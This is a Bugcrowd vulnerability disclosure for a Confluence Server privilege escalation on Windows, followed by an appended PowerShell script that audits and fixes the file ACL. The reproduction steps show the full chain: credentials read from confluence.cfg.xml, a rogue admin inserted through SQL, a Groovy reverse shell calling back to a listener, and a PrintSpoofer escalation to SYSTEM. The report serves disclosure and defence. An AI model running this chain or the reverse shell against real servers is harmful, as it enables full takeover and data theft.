Local Privilege Escalation via Confluence Server

Disclosed by
matcluck
  • Engagement: Atlassian
  • Disclosed date: 5 months ago
  • Reward: $800
  • Priority: P3 (Bugcrowd's VRT priority rating)
  • Status: Resolved (this vulnerability has been accepted and fixed)
Summary by Atlassian

Local Privilege Escalation Vulnerability in Confluence Server

Summary by matcluck

Confluence Data Center was vulnerable to local privilege escalation due to insecure permissions applied to a configuration file. An attacker with local file system access could exploit this to achieve NT AUTHORITY\SYSTEM access.

Report details
  • Target Location: Confluence Data Center
  • Target category: Other
  • VRT: Server Security Misconfiguration
  • Priority: P3
  • Bug URL: Empty
  • Description

    Overview

    With low privilege access (standard user access) to a Windows host running Confluence Server, it is possible to escalate privileges to Confluence administrator and NT AUTHORITY\SYSTEM by extracting secrets from confluence.cfg.xml (C:\Program Files\Atlassian\Application Data\Confluence\confluence.cfg.xml).

    An out-of-the-box Confluence Server installation configures this file so that it is readable by all members of the local Users group (see Screenshot1.png).

    An adversary with a low privilege foothold on a Windows host running Confluence Server would be able to exploit this vulnerability to gain complete control of the server and Confluence data contained within.

    Reproduction Steps

    1. Extract the database credentials from the confluence.cfg.xml file:
    C:\Users\lowpriv>whoami /groups
    
    GROUP INFORMATION
    -----------------
    
    Group Name                             Type             SID          Attributes
    ====================================== ================ ============ ==================================================
    Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
    BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
    CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
    LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
    Mandatory Label\Medium Mandatory Level Label            S-1-16-8192
    
    C:\Users\lowpriv>type "C:\Program Files\Atlassian\Application Data\Confluence\confluence.cfg.xml" | findstr /c:"hibernate.connection.username" /c:"hibernate.connection.password"
        <property name="hibernate.connection.password">confluence</property>
        <property name="hibernate.connection.username">postgres</property>
    
    
    2. Connect to the DBMS using the extracted credentials:
    C:\Program Files\PostgreSQL\16rc1\bin>psql -U postgres
    Password for user postgres:
    psql (16rc1)
    WARNING: Console code page (437) differs from Windows code page (1252)
             8-bit characters might not work correctly. See psql reference
             page "Notes for Windows users" for details.
    Type "help" for help.
    
    postgres=# \c confluence
    You are now connected to database "confluence" as user "postgres".
    confluence=#
    
    3. Using SQL and the cwd tables, add a Confluence user.

    Note: {PKCS5S2}yLIYwNvu4mbhTXYF0ZE0CW/IKpG78xrakS1qlm1uuW0I506icmhxmIt+P2v5IDKu is the hashed value of the password admin.

    confluence=# insert into cwd_user (id, user_name, lower_user_name, active, created_date, updated_date, last_name, lower_last_name, display_name, lower_display_name, email_address, lower_email_address, external_id, directory_id, credential) values (491523, 'bugcrowd', 'bugcrowd', 'T', '2023-09-12 19:46:07.587', '2023-09-12 19:46:07.587', 'bugcrowd', 'bugcrowd', 'bugcrowd', 'bugcrowd', 'ct.celliott@gmail.com', 'ct.celliott@gmail.com', '9d9c7244-e4ad-465b-91c5-dfeaad4c39c3',360449,'{PKCS5S2}yLIYwNvu4mbhTXYF0ZE0CW/IKpG78xrakS1qlm1uuW0I506icmhxmIt+P2v5IDKu');
    
    confluence=# select id, user_name, credential from cwd_user;
       id   | user_name |                                credential
    --------+-----------+---------------------------------------------------------------------------
     491521 | admin     | {PKCS5S2}yLIYwNvu4mbhTXYF0ZE0CW/IKpG78xrakS1qlm1uuW0I506icmhxmIt+P2v5IDKu
     491522 | hacker    | {PKCS5S2}yLIYwNvu4mbhTXYF0ZE0CW/IKpG78xrakS1qlm1uuW0I506icmhxmIt+P2v5IDKu
     491523 | bugcrowd  | {PKCS5S2}yLIYwNvu4mbhTXYF0ZE0CW/IKpG78xrakS1qlm1uuW0I506icmhxmIt+P2v5IDKu
    
    4. Add the user to the confluence-administrators and confluence-users groups:
    confluence=# select id, group_name from cwd_group;
       id   |        group_name
    --------+---------------------------
     425985 | confluence-administrators
     425986 | confluence-users
    (2 rows)
    
    
    confluence=# insert into cwd_membership (id, parent_id, child_user_id) values (589829, 425986, 491523);
    INSERT 0 1
    confluence=# insert into cwd_membership (id, parent_id, child_user_id) values (589830, 425985, 491523);
    INSERT 0 1
    confluence=# select * from cwd_membership;
       id   | parent_id | child_group_id | child_user_id
    --------+-----------+----------------+---------------
     589825 |    425986 |                |        491521
     589826 |    425985 |                |        491521
     589827 |    425986 |                |        491522
     589828 |    425985 |                |        491522
     589829 |    425986 |                |        491523
     589830 |    425985 |                |        491523
    (6 rows)
    
    5. Add a user mapping entry for the user:
    confluence=# insert into user_mapping (user_key, username, lower_username) values ('4028db008a893503018a89379e250003', 'bugcrowd', 'bugcrowd');
    INSERT 0 1
    confluence=# select * from user_mapping;
                 user_key             | username | lower_username
    ----------------------------------+----------+----------------
     4028db008a893503018a8935f3940000 | admin    | admin
     4028db008a893503018a89379e250001 | exporter | exporter
     4028db008a893503018a89379e250002 | hacker   | hacker
     4028db008a893503018a89379e250003 | bugcrowd | bugcrowd
    (4 rows)
    
    6. Log in to Confluence as the newly created admin (bugcrowd:admin) and observe that we have successfully achieved Confluence administrator level access (see Screenshot2.png).

    7. With admin access, it is possible to achieve command execution in the security context that the Confluence process is running as. For example, we can use the ScriptRunner plugin to execute a Groovy reverse shell (see Screenshot3.png):

    String host="192.168.1.142";
    int port=1234;
    String cmd="cmd.exe";
    Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
    Socket s=new Socket(host,port);
    InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
    OutputStream po=p.getOutputStream(),so=s.getOutputStream();
    while(!s.isClosed()){
        while(pi.available()>0)so.write(pi.read());
        while(pe.available()>0)so.write(pe.read());
        while(si.available()>0)po.write(si.read());
        so.flush();
        po.flush();
        Thread.sleep(50);
        try {p.exitValue();break;}catch (Exception e){}
    };
    p.destroy();
    s.close();
    
    8. With the ability to execute shell commands, we can observe that the Confluence process security context has the SeImpersonatePrivilege privilege:
    [celliott@fedora ~]$ nc -lvp 1234
    Ncat: Version 7.93 ( https://nmap.org/ncat )
    Ncat: Listening on :::1234
    Ncat: Listening on 0.0.0.0:1234
    Ncat: Connection from 192.168.1.142.
    Ncat: Connection from 192.168.1.142:58735.
    Microsoft Windows [Version 10.0.19045.2965]
    (c) Microsoft Corporation. All rights reserved.
    
    C:\Program Files\Atlassian\Confluence>whoami /priv
    whoami /priv
    
    PRIVILEGES INFORMATION
    ----------------------
    
    Privilege Name                Description                               State   
    ============================= ========================================= ========
    SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
    SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
    SeShutdownPrivilege           Shut down the system                      Disabled
    SeAuditPrivilege              Generate security audits                  Disabled
    SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
    SeUndockPrivilege             Remove computer from docking station      Disabled
    SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
    SeCreateGlobalPrivilege       Create global objects                     Enabled 
    SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
    SeTimeZonePrivilege           Change the time zone                      Disabled
    
    9. We can use this privilege to impersonate a SYSTEM token. For example, impersonating the Print Spooler service is a viable option on modern Windows:
    C:\temp>PrintSpoofer64.exe -i -c powershell.exe
    PrintSpoofer64.exe -i -c powershell.exe
    [+] Found privilege: SeImpersonatePrivilege
    [+] Named pipe listening...
    [+] CreateProcessAsUser() OK
    Windows PowerShell
    Copyright (C) Microsoft Corporation. All rights reserved.
    
    Try the new cross-platform PowerShell https://aka.ms/pscore6
    
    PS C:\Windows\system32> whoami
    whoami
    nt authority\system
    PS C:\Windows\system32>
    
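A defender-side check for the root cause described in the Overview, added here as an example and not part of matcluck's report or Atlassian's fix: a PowerShell script that inspects the ACL of confluence.cfg.xml for read access granted to Everyone, Authenticated Users or BUILTIN\Users (the groups every standard user carries in the whoami /groups output above) and, when run with -Fix, restricts the file to SYSTEM, Administrators and the service account. The path is the default from the report; $ServiceAccount is a placeholder to replace with the identity the Confluence Windows service actually runs as.

```powershell
# Added example, not from the report or Atlassian: audit (and optionally fix) the
# ACL of confluence.cfg.xml so that ordinary local users cannot read the DB secrets.
# The default path comes from the report; $ServiceAccount is a placeholder for the
# identity the Confluence Windows service actually runs as.
param(
    [string]$Path = 'C:\Program Files\Atlassian\Application Data\Confluence\confluence.cfg.xml',
    [string]$ServiceAccount = 'NT AUTHORITY\SYSTEM',   # placeholder, replace with the service identity
    [switch]$Fix
)

# Well-known SIDs that every interactive local user carries (see whoami /groups in the report).
$BroadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'NT AUTHORITY\Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
}

$acl = Get-Acl -LiteralPath $Path
$findings = foreach ($ace in $acl.Access) {
    if ($ace.AccessControlType -ne 'Allow') { continue }
    try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
    catch { continue }   # unresolvable (orphaned) SIDs cannot be one of the broad groups
    # ReadData is the bit that allows reading file contents; Read and FullControl both include it.
    $canRead = ($ace.FileSystemRights -band [System.Security.AccessControl.FileSystemRights]::ReadData) -ne 0
    if ($BroadSids.ContainsKey($sid) -and $canRead) {
        [pscustomobject]@{ Principal = $BroadSids[$sid]; Rights = $ace.FileSystemRights; Inherited = $ace.IsInherited }
    }
}

if (-not $findings) {
    Write-Output "OK: no broad local group has read access to $Path"
    return
}
Write-Warning "confluence.cfg.xml is readable by low-privilege local users:"
$findings | Format-Table -AutoSize | Out-String | Write-Warning
if ($Fix) {
    # Stop inheriting ACEs from the parent directory, drop any explicit ACEs,
    # then grant only SYSTEM, Administrators and the service account.
    $acl.SetAccessRuleProtection($true, $false)
    foreach ($ace in @($acl.Access | Where-Object { -not $_.IsInherited })) { [void]$acl.RemoveAccessRule($ace) }
    $full = [System.Security.AccessControl.FileSystemRights]::FullControl
    $read = [System.Security.AccessControl.FileSystemRights]::Read
    foreach ($p in 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators') {
        $acl.AddAccessRule((New-Object System.Security.AccessControl.FileSystemAccessRule($p, $full, 'Allow')))
    }
    $acl.AddAccessRule((New-Object System.Security.AccessControl.FileSystemAccessRule($ServiceAccount, $read, 'Allow')))
    Set-Acl -LiteralPath $Path -AclObject $acl
    Write-Output "Fixed: $Path is now readable only by SYSTEM, Administrators and $ServiceAccount"
}
```

Run it from an elevated prompt; without -Fix it only reports, so it can be scheduled as a periodic drift check against the permissions the vendor fix is meant to enforce.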